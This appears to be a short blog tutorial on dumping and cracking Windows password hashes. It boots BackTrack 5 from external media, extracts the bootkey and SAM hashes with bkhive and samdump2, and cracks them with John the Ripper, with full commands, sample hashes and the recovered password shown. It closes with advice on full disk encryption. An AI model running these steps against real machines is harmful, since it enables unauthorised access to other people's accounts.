Simply drop in your backtrack5 CD or USB and boot from the inserted media. Once booted type startx, you can do everything from the console but it’s nicer to have a pretty GUI!
Left click Places at the top and then click on the windows partition you wish to mount.
Then open a terminal and first of all use bkhive to dump the syskey bootkey from the windows hive.
1 2 3 4 5 6 7 8 | root@bt:~# bkhive /media/10B9-F2B6/WINNT/system32/config/SYSTEM /root/keyfile.txt bkhive 1.1.1 by Objectif Securite http://www.objectif-securite.ch original author: ncuomo@studenti.unina.it Root Key : $$$PROTO.HIV Default ControlSet: 001 Bootkey: 7abeb4c282eaef5bfa7a75c197be8f85 |
The next step is to use the SAM file along with the bootkey to get at the hashes:
1 2 3 4 5 6 7 8 9 10 11 | root@bt:~# samdump2 /media/10B9-F2B6/WINNT/system32/config/SAM /root/keyfile.txt | tee hashes.txt samdump2 1.1.1 by Objectif Securite http://www.objectif-securite.ch original author: ncuomo@studenti.unina.it Root Key : SAM Administrator:500:1d9321d6da8213bdc4482861fc3ea9db:80290fc9b3c2b233769aa9d6ced8bc86::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: ASPNET:1000:b50fd6425ebf847332ada17f89c09dc9:63c184dd474f5d902a830545d9bdcfad::: IUSR_WEBINSPECT:1001:eeb699201309cb097b3ac7d5e9ecfe77:d61861bf937514d0a6dd9fbf4e7b8376::: IWAM_WEBINSPECT:1002:7d5621a567c0b5433c884480b718e30a:a4283d74fda5cd3a65641d52873adb78::: |
Now that we have the hashes we can start cracking them using bruteforce or wordlist attacks. In this example I will use john the ripper as it’s just a quick demo but you could also use ophcrack to utilise rainbow tables or hashcat to utilise the power of your GPU.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | root@bt:~# cd /pentest/passwords/john/ root@bt:/pentest/passwords/john# john /root/hashes.txt Warning: detected hash type "lm", but the string is also recognized as "nt" Use the "--format=nt" option to force loading these as that type instead Warning: detected hash type "lm", but the string is also recognized as "nt2" Use the "--format=nt2" option to force loading these as that type instead Loaded 9 password hashes with no different salts (LM DES [128/128 BS SSE2]) (Guest) NK (Administrator:2) HACMEBA (Administrator:1) guesses: 3 time: 0:00:00:39 0.01% (3) c/s: 173509K trying: 08529IK - 08527NI Warning: passwords printed above might be partial Use the "--show" option to display all of the cracked passwords reliably Session aborted |
Bingo! Looks like we’ve got the first and seconds parts of the 9 character password (which was split into 2 hashes of lengths 7chars and then 2 chars, the whole reason we use passwords of more than 14 characters!)
1 2 3 4 5 6 | root@bt:/pentest/passwords/john# john --show /root/hashes.txt Administrator:HACMEBANK:1d9321d6da8213bdc4482861fc3ea9db:80290fc9b3c2b233769aa9d6ced8bc86::: Guest::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 3 password hashes cracked, 6 left root@bt:/pentest/passwords/john# |
Password = HACMEBANK
So the moral of the story is use full disk encryption to protect this type of attack (and as extra precaution prevent booting of CD, DVD and removable media devices)
Leave a Reply
You must be logged in to post a comment.